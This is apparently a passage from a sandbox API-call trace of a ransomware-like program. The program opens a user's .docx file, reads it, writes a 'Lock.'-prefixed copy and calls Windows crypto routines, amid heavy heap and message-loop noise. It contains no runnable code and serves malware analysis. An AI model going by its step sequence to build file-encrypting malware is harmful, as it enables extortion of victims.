HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0267.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0267.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0267.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0267.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0267.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0267.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.447] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0267.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.448] CryptDestroyHash (hHash=0xa87710) returned 1 [0267.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/S7DDzGLO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s7ddzglo.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0267.449] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0267.449] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0267.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0267.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0267.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.451] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0267.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0267.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.S7DDzGLO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.s7ddzglo.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0267.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0267.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0267.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0267.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1256020 [0267.464] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0267.464] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x6794, lpOverlapped=0x0) returned 1 [0267.467] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0267.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f16018 [0267.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1256020 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f1c7b8 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.472] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f16018 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.473] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f16018 [0267.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55098 [0267.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f88 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550f8 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f22f58 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.475] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0267.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 